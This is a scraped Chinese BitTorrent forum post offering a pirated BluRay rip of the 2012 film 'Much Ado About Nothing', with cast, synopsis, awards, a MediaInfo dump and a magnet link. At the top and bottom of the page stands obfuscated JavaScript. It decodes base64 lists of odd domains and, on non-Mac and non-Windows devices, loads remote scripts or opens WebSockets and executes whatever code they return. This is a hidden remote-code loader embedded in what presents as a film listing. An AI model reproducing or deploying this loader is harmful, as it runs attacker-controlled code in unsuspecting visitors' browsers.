无事生非[简繁字幕].Much.Ado.About.Nothing.2012.BluRay.1080p.DTS-HD.MA5.1.x265.10bit 12.86GB

版主小s 1月前 234

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 无事生非

◎片 名 Much Ado About Nothing

◎年 代 2012

◎产 地 美国

◎类 别 剧情 / 喜剧 / 爱情

◎语 言 英语

◎上映日期 2012-09-08(多伦多电影节) / 2013-06-07(美国)

◎IMDb链接 https://www.imdb.com/title/tt2094064/

◎豆瓣评分 7.0/10 (1416人评价)

◎豆瓣链接 https://movie.douban.com/subject/10573677/

◎片 长 107分钟

◎导 演 乔斯·韦登 Joss Whedon (id:1010552)

◎编 剧 乔斯·韦登 Joss Whedon (id:1010552)

威廉·莎士比亚 William Shakespeare (id:1044735)

◎演 员 艾米·阿克 Amy Acker (id:1036347)

埃里克斯·德尼索夫 Alexis Denisof (id:1031897)

里德·戴蒙德 Reed Diamond (id:1088984)

内森·菲利安 Nathan Fillion (id:1000003)

克拉克·格雷格 Clark Gregg (id:1000083)

弗兰·克朗茨 Fran Kranz (id:1113019)

肖恩·马希尔 Sean Maher (id:1125831)

吉莉安·莫格斯 Jillian Morgese (id:1335274)

艾什莉·约翰逊 Ashley Johnson (id:1027120)

德鲁·戈达德 Drew Goddard (id:1032271)

汤姆·伦克 Tom Lenk (id:1123226)

瑞琪·琳德赫姆 Riki Lindhome (id:1031927)

斯宾塞·崔特·克拉克 Spencer Treat Clark (id:1027222)

乔斯·韦登 Joss Whedon (id:1010552)

乔斯·韦登 Joss Whedon (id:1010552)

乔斯·韦登 Joss Whedon (id:1010552)

◎标 签 美国 / 喜剧 / 莎士比亚 / 名著改编 / JossWhedon / 爱情 / 2012 / 美国电影

◎简 介

克劳迪欧(弗兰·克兰兹 Fran Kranz 饰)和女友希罗交往多年,两人之间感情十分稳定,携手步入婚姻殿堂的感情结局已是板上钉钉,目前,两人正怀着激动的心情筹备着他们盛大的婚礼。自己的婚姻大事有了着落,这对新人们便开始“多管闲事”起来,两人的朋友班尼迪克(埃里克斯·德尼索夫 Alexis Denisof 饰)和碧翠丝(艾米·阿克 Amy Acker 饰)成为了他们的目标。

碧翠丝是一位典型的现代女性,她思维活络,伶牙俐齿,有着不属于男子的精神气。而班尼迪克则是典型的大男子主义,他甚至有终身不婚的大胆想法,当这一对性格针锋相对的男女碰到一起,少不了唇枪舌剑锋芒毕露,不过,感情的萌芽亦在火热的交锋之中逐渐茁壮。

◎获奖情况 (共2项)

第85届美国国家评论协会奖 (2014)

十佳独立电影

第13届凤凰城影评人协会奖 (2013)

年度被忽略影片(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 18646193103339251162978858321179419244 (0xE07204C53AA33ABA3A7D849F67DA26C)

  4. Complete name : Much.Ad[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 12.9 GiB

  8. Duration : 1 h 48 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 16.9 Mb/s

  11. Encoded date : UTC 2021-10-17 07:17:04

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 48 min

  21. Bit rate : 13.0 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.262

  31. Stream size : 9.92 GiB (77%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 13049 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / total-frames=156616 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 48 min

  49. Bit rate mode : Variable

  50. Bit rate : 3 303 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossless

  57. Stream size : 2.51 GiB (20%)

  58. Title : English DTS-HD Master Audio 5.1 @ 3303 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : AC-3

  65. Format/Info : Audio Coding 3

  66. Commercial name : Dolby Digital

  67. Codec ID : A_AC3

  68. Duration : 1 h 48 min

  69. Bit rate mode : Constant

  70. Bit rate : 192 kb/s

  71. Channel(s) : 2 channels

  72. Channel layout : L R

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 150 MiB (1%)

  77. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary 1

  78. Language : English

  79. Service kind : Commentary

  80. Default : No

  81. Forced : No


  82. Audio #3

  83. ID : 4

  84. Format : AC-3

  85. Format/Info : Audio Coding 3

  86. Commercial name : Dolby Digital

  87. Codec ID : A_AC3

  88. Duration : 1 h 48 min

  89. Bit rate mode : Constant

  90. Bit rate : 192 kb/s

  91. Channel(s) : 2 channels

  92. Channel layout : L R

  93. Sampling rate : 48.0 kHz

  94. Frame rate : 31.250 FPS (1536 SPF)

  95. Compression mode : Lossy

  96. Stream size : 150 MiB (1%)

  97. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary 2

  98. Language : English

  99. Service kind : Commentary

  100. Default : No

  101. Forced : No


  102. Text #1

  103. ID : 5

  104. Format : PGS

  105. Codec ID : S_HDMV/PGS

  106. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  107. Duration : 1 h 41 min

  108. Bit rate : 49.3 kb/s

  109. Count of elements : 2874

  110. Stream size : 35.6 MiB (0%)

  111. Title : Eng/SUP

  112. Language : English

  113. Default : No

  114. Forced : No


  115. Text #2

  116. ID : 6

  117. Format : PGS

  118. Codec ID : S_HDMV/PGS

  119. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration : 1 h 41 min

  121. Bit rate : 51.5 kb/s

  122. Count of elements : 3050

  123. Stream size : 37.2 MiB (0%)

  124. Title : Eng/SUP SDH

  125. Language : English

  126. Default : No

  127. Forced : No


  128. Text #3

  129. ID : 7

  130. Format : PGS

  131. Codec ID : S_HDMV/PGS

  132. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  133. Duration : 1 h 45 min

  134. Bit rate : 36.3 kb/s

  135. Count of elements : 1965

  136. Stream size : 27.3 MiB (0%)

  137. Title : Chs/SUP 简体

  138. Language : Chinese

  139. Default : Yes

  140. Forced : No


  141. Text #4

  142. ID : 8

  143. Format : PGS

  144. Codec ID : S_HDMV/PGS

  145. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  146. Duration : 1 h 45 min

  147. Bit rate : 37.4 kb/s

  148. Count of elements : 1965

  149. Stream size : 28.2 MiB (0%)

  150. Title : Cht/SUP 繁体

  151. Language : Chinese

  152. Default : No

  153. Forced : No


  154. Menu

  155. 00:00:00.000 : en:第 01 章

  156. 00:06:36.605 : en:第 02 章

  157. 00:13:47.952 : en:第 03 章

  158. 00:19:00.306 : en:第 04 章

  159. 00:26:27.586 : en:第 05 章

  160. 00:32:24.901 : en:第 06 章

  161. 00:38:38.191 : en:第 07 章

  162. 00:44:45.016 : en:第 08 章

  163. 00:53:11.397 : en:第 09 章

  164. 00:58:50.068 : en:第 10 章

  165. 01:05:20.166 : en:第 11 章

  166. 01:13:13.347 : en:第 12 章

  167. 01:19:29.807 : en:第 13 章

  168. 01:23:51.610 : en:第 14 章

  169. 01:30:42.729 : en:第 15 章

  170. 01:45:00.711 : en:第 16 章




复制代码


TAGS 剧情 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:E631DC44534BE592F99F8CD8C22AA65A8192AACA

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};